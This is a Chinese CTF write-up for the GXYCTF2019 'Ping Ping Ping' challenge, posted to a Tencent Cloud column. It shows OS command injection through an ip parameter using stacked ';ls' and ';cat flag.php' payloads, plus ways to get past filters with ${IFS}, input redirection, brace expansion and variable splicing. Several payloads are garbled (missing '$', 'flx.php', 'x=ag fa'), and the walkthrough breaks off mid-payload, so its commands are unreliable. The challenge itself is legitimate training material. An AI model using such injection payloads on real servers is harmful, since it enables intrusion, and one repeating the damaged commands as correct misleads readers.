前往小程序,Get更优阅读体验!
立即前往
发布
社区首页 >专栏 >[GXYCTF2019]Ping Ping Ping 1

[GXYCTF2019]Ping Ping Ping 1

作者头像
用户8909609
发布2023-10-26 16:07:25
发布2023-10-26 16:07:25
4210
举报
文章被收录于专栏:BM CTFBM CTF

题目环境

给了一个ip参数 注意题目Ping Ping Ping 意思就是让我们进行Ping地址 随便输入一个地址Ping一下

URL?ip=0

有回显结果,和上题类似 [ACTF2020 新生赛]Exec 1-CSDN博客

查看当前目录文件 URL?ip=0;ls(这里使用堆叠注入查询)

直接给出了咱们flag文件,事实上真的有这么简单吗? 查看flag文件看看是什么情况 URL?ip=0;cat flag.php

空格报错! 查看flag关键字是否被过滤 URL?ip=0;flag.php

flag报错! 查看字符是否被过滤 URL?ip=0;/

字符报错! 好啊好啊,过滤这么多东西,不过好在/符号不用绕过了,因为flag就在当前目录 空格绕过

  1. cat${IFS}flag.txt
  2. catIFS9flag.txt (正整数可以是任意)
  3. cat<flag.txt
  4. cat<>flag.txt
  5. {cat,flag.txt}

flag关键字绕过

可以使用定义变量绕过

x=ag fa

x=flag

构造payload:**URL?ip=0;x=ag;cat{IFS}flx.php**字符报错!猜测"{}"被过滤试试第二种空格绕过方法构造payload:**URL?ip=0;x=ag;catIFS1fl

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023-10-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档